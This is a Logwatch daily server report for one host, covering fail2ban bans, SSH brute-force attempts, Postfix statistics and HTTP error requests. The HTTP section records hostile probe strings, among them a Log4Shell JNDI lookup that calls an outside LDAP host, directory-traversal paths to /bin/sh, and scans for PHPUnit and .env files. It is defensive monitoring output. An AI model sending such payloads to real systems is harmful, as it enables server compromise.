################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Sat Jan 1 04:42:04 2022
Date Range Processed: yesterday
( 2021-Dec-31 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 53:53 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
54.183.214.154 -> zapf.wiki:443: 1 Time(s)
92.118.234.202 -> zapf.wiki:443: 7 Time(s)
A total of 10 sites probed the server
Requests with error response codes
400 Bad Request
null: 23 Time(s)
zapf.wiki:443: 8 Time(s)
mstshash=Domain: 4 Time(s)
/phpmyadmin/scripts/setup.php: 3 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
/: 1 Time(s)
/.env: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
HTTP/1.0: 1 Time(s)
404 Not Found
//2019/wp-includes/wlwmanifest.xml: 2 Time(s)
//2020/wp-includes/wlwmanifest.xml: 2 Time(s)
//blog/wp-includes/wlwmanifest.xml: 2 Time(s)
//cms/wp-includes/wlwmanifest.xml: 2 Time(s)
//news/wp-includes/wlwmanifest.xml: 2 Time(s)
//shop/wp-includes/wlwmanifest.xml: 2 Time(s)
//site/wp-includes/wlwmanifest.xml: 2 Time(s)
//sito/wp-includes/wlwmanifest.xml: 2 Time(s)
//test/wp-includes/wlwmanifest.xml: 2 Time(s)
//web/wp-includes/wlwmanifest.xml: 2 Time(s)
//website/wp-includes/wlwmanifest.xml: 2 Time(s)
//wordpress/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp-includes/wlwmanifest.xml: 2 Time(s)
//wp/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp1/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp2/wp-includes/wlwmanifest.xml: 2 Time(s)
//xmlrpc.php?rsd: 2 Time(s)
500 Internal Server Error
/: 40 Time(s)
/robots.txt: 3 Time(s)
/.env: 2 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/.git/HEAD: 1 Time(s)
///remote/fgt_lang?lang=/../../../..//////////dev/: 1 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/actuator/health: 1 Time(s)
/login.cs: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (67.205.162.21): 33 Time(s)
root (118.89.162.250): 32 Time(s)
root (178.154.196.230): 32 Time(s)
root (42.193.184.210): 32 Time(s)
root (106.12.194.13): 31 Time(s)
root (81.68.93.27): 31 Time(s)
root (1.116.25.72): 29 Time(s)
unknown (139.59.44.143): 24 Time(s)
root (146.56.192.231): 23 Time(s)
root (180.250.248.170): 22 Time(s)
root (203.205.37.224): 20 Time(s)
root (202.112.61.110): 19 Time(s)
unknown (106.12.194.13): 19 Time(s)
unknown (202.21.123.198): 19 Time(s)
unknown (1.116.25.72): 18 Time(s)
unknown (118.89.162.250): 18 Time(s)
unknown (42.193.184.210): 18 Time(s)
unknown (178.154.196.230): 17 Time(s)
unknown (67.205.162.21): 17 Time(s)
unknown (81.68.93.27): 16 Time(s)
root (185.74.4.189): 15 Time(s)
root (217.117.14.248): 15 Time(s)
unknown (146.56.192.231): 15 Time(s)
unknown (185.74.4.189): 10 Time(s)
unknown (144.126.208.202): 9 Time(s)
root (118.195.145.14): 8 Time(s)
unknown (202.112.61.110): 8 Time(s)
unknown (203.205.37.224): 8 Time(s)
root (62.209.63.32): 7 Time(s)
unknown (180.250.248.170): 7 Time(s)
root (104.244.73.93): 6 Time(s)
root (monero.mnpnk.com): 6 Time(s)
unknown (217.117.14.248): 5 Time(s)
root (139.59.44.143): 4 Time(s)
root (14.143.137.18): 4 Time(s)
root (134.17.16.92): 3 Time(s)
root (162.243.20.232): 3 Time(s)
unknown (118.195.145.14): 3 Time(s)
unknown (162.243.20.232): 3 Time(s)
root (202.21.123.198): 2 Time(s)
unknown (134.17.16.92): 2 Time(s)
unknown (199.195.253.100): 2 Time(s)
unknown (209.141.44.198): 2 Time(s)
unknown (modemcable254.188-200-24.mc.videotron.ca): 2 Time(s)
postgres (81.68.93.27): 1 Time(s)
root (120.230.104.74): 1 Time(s)
root (178.128.216.205): 1 Time(s)
root (tor-exit.a9.wtf): 1 Time(s)
root (tor-project-exit1.dotsrc.org): 1 Time(s)
unknown (14.143.137.18): 1 Time(s)
unknown (178.213.248.102): 1 Time(s)
unknown (203.128.242.166): 1 Time(s)
Invalid Users:
Unknown Account: 245 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
9.722K Bytes accepted 9,955
9.722K Bytes sent via SMTP 9,955
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
196 Connections
7 Connections lost (inbound)
196 Disconnections
1 Removed from queue
1 Sent via SMTP
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 2 Time(s)
Failed logins from:
1.116.25.72: 29 times
14.143.137.18 (14.143.137.18.static-pune.vsnl.net.in): 4 times
42.193.184.210: 32 times
62.209.63.32: 7 times
67.205.162.21: 33 times
81.68.93.27: 32 times
104.244.73.93 (LuxembourgTor3): 6 times
104.244.74.28 (tor-exit.a9.wtf): 5 times
106.12.194.13: 31 times
118.89.162.250: 32 times
118.195.145.14: 8 times
120.230.104.74: 1 time
134.17.16.92 (92-16-17-134-cloud.mts.by): 3 times
139.59.44.143: 4 times
146.56.192.231: 23 times
162.243.20.232: 3 times
178.128.216.205: 1 time
178.154.196.230: 32 times
180.250.248.170: 22 times
185.74.4.189: 15 times
185.129.61.1 (tor-project-exit1.dotsrc.org): 4 times
202.21.123.198: 2 times
202.112.61.110: 19 times
203.205.37.224 (static.cmcti.vn): 20 times
209.141.34.232 (monero.mnpnk.com): 6 times
217.117.14.248: 15 times
Illegal users from:
2001:470:1:332::2 (the-shadow-server-foundation.e0-1.core1.sfo2.he.net): 1 time
undef: 187 times
1.116.25.72: 18 times
14.143.137.18 (14.143.137.18.static-pune.vsnl.net.in): 1 time
24.200.188.254 (modemcable254.188-200-24.mc.videotron.ca): 2 times
42.193.184.210: 18 times
45.88.137.100: 1 time
65.49.20.69 (scan-20.shadowserver.org): 1 time
67.205.162.21: 17 times
81.68.93.27: 16 times
106.12.194.13: 19 times
118.89.162.250: 18 times
118.195.145.14: 3 times
134.17.16.92 (92-16-17-134-cloud.mts.by): 2 times
139.59.44.143: 24 times
144.126.208.202: 9 times
146.56.192.231: 15 times
162.243.20.232: 3 times
178.73.215.171 (178-73-215-171-static.glesys.net): 1 time
178.154.196.230: 17 times
178.213.248.102: 1 time
180.250.248.170: 7 times
185.74.4.189: 10 times
199.195.253.100: 2 times
202.21.123.198: 19 times
202.112.61.110: 8 times
203.128.242.166: 1 time
203.205.37.224 (static.cmcti.vn): 8 times
209.141.44.198: 2 times
217.117.14.248: 5 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################